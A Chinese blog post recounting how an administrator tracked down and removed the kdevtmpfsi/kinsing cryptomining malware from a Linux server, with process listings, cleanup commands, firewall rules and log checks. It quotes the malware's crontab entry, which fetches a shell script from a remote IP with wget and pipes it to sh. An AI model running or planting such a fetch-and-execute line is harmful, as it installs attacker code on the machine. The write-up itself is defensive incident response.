kdevtmpfsi病毒处理

1.服务器响应慢,使用top查看。发现cpu%的进程是kdevtmpfsi

[root@localhost tmp]# top
top - 09:06:20 up 3 days, 18:29,  3 users,  load average: 6.07, 6.39, 6.40
Tasks: 295 total,   1 running, 294 sleeping,   0 stopped,   0 zombie
%Cpu(s): 51.0 us,  1.0 sy,  0.0 ni, 47.9 id,  0.0 wa,  0.0 hi,  0.0 si,  0.0 st
KiB Mem : 32691004 total,  5359172 free, 23604872 used,  3726960 buff/cache
KiB Swap:  5242876 total,  3341564 free,  1901312 used.  8605784 avail Mem 

  PID USER      PR  NI    VIRT    RES    SHR S  %CPU %MEM     TIME+ COMMAND                                                                                                                              
 8240 root      20   0 3227668   6568      0 S 587.5  0.0 493:17.97 kdevtmpfsi                                                                                                                           
15077 root      20   0   16.2g   2.5g   7388 S  12.5  8.1  80:20.88 java                                                                                                                                 
    1 root      20   0  191676   3540   1876 S   0.0  0.0   0:15.98 systemd                                                                                                                              
    2 root      20   0       0      0      0 S   0.0  0.0   0:00.06 kthreadd  

2.kdevtmpfsi进程是什么,造成占用这么高
3.百度了下原来是一个挖矿病毒。
4.先查询这个进程相关的守护进程相关的

[root@localhost tmp]# systemctl status 8240
● session-346.scope - Session 346 of user root
   Loaded: loaded (/run/systemd/system/session-346.scope; static; vendor preset: disabled)
  Drop-In: /run/systemd/system/session-346.scope.d
           └─50-After-systemd-logind\x2eservice.conf, 50-After-systemd-user-sessions\x2eservice.conf, 50-Description.conf, 50-SendSIGHUP.conf, 50-Slice.conf, 50-TasksMax.conf
   Active: active (abandoned) since 三 2023-03-08 15:28:40 CST; 1 day 17h ago
   CGroup: /user.slice/user-0.slice/session-346.scope
           ├─ 7239 /etc/kinsing
           ├─ 8240 /tmp/kdevtmpfsi

通过上面的可以看的7239跟他相关,我们要先删除守护进程。

通过如下方式
删除文件
rm -f /var/tmp/kinsing
rm -f /tmp/kdevtmpfsi
kill相关的进程
ps -aux | grep kinsing |grep -v grep|cut -c 9-15 | xargs kill -9
ps -aux | grep kdevtmpfsi |grep -v grep|cut -c 9-15 | xargs kill -9
5.通过上面后top命令查看,没有再出现。可是过了一会进程又启动了,杀不了?想想估计是跟定时任务有关。
于是,查询定时任务列表。
crontab -l

* * * * * wget -q -O - http://185.122.204.197/scg.sh | sh > /dev/null 2>&1

如果有个定时任务从远程服务器拉取下来脚本执行。

6.删除定时任务列表
crontab -r
7.并且将这么ip禁止掉

--禁用ip
firewall-cmd --permanent --add-rich-rule='rule family=ipv4 source address="185.122.204.197" drop'

-- 重启防火墙
firewall-cmd --reload

并配置了定时任务
kill_kdevtmpfsi.sh脚本内容如下

ps -aux | grep kinsing |grep -v grep|cut -c 9-15 | xargs kill -9
ps -aux | grep kdevtmpfsi |grep -v grep|cut -c 9-15 | xargs kill -9
rm -f /etc/kinsing
rm -f /tmp/kdevtmpfsi

crontab -e

*/1 * * * * /tmp/kill_kdevtmpfsi.sh

8.通过上面的操作后,过后进程没有在出现。
9.这个病毒是怎么进来的?网上说是有可能是redis没有设置密码造成的。
于是重新装了redis并设置了密码。将应用的配置修改重启后,一切正常。跟老板回复可以,
一切操作干到晚上22点,回家了。回到家里,特地的访问了下网站。还是正常的。于是就洗漱睡觉了。
10.第二天由于要出差,早上让同事到了公司检查下。到了公司反馈服务器用xshell连接不上了。
心头一愣。今天准备给客户演示的,来这么招。于是让他找到服务器,直接到机器上去操作。
11.找到服务器后,上去看。发现昨天的那个进程还在,并且定时任务也启动了。头大了!!!
远程连接连接不上,估计是sshd服务挂了。于是让他看下服务的状态。

--查询sshd服务状态
service sshd status
没有启动

--启动sshd服务
systemctl start sshd

正常后回到了工位上继续操作

只能先用昨天的方法操作一般。
用命令netstat -lntupaa查看相关的连接,并封禁了相关的ip

12.查询跟病毒相关的名称

find / -name kdevtmpfsi
find / -name kinsing

也没有

查看目录下是否有其它的任务

cd /var/spool/cron 

没有

13.在/tmp目录中查询有crontab.uRB4rJ这个文件,由于昨天我们自己的定时任务被删除了。
怀疑是病毒给替换了。文件里面的内容是空的。

14.通过上面的操作进程暂时没有启动。

15.病毒将nginx进程和应用的进程也都给kill掉了

系统日志
/var/log/

-- 启动的服务列表
systemctl list-unit-files

--经过这条命令能够看到的确有大量失败登陆的记录:
grep -o "Failed password" /var/log/secure|uniq -c

记录登录情况

/var/log/secure.log

记录定时任务情况
cron.log

记录的是系统日志
/var/log/messages.log

image.png

通过日志可以看出远程连接的sshd服务被kill掉了。所以导致之前的远程连接不上。
为什么被kill掉,前面大于的网络攻击导致sshd服务挂了

image.png

kernel: hid-generic 0003:046D:C34B.0001: usb_submit_urb(ctrl) failed: -19
系统温度过高。中了病毒导致cpu升高,长时间系统温度过高

服务器安全加固

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 207,248评论 6 481
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 88,681评论 2 381
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 153,443评论 0 344
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 55,475评论 1 279
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 64,458评论 5 374
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 49,185评论 1 284
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 38,451评论 3 401
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 37,112评论 0 261
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 43,609评论 1 300
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 36,083评论 2 325
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 38,163评论 1 334
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 33,803评论 4 323
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 39,357评论 3 307
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 30,357评论 0 19
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 31,590评论 1 261
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 45,636评论 2 355
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 42,925评论 2 344

推荐阅读更多精彩内容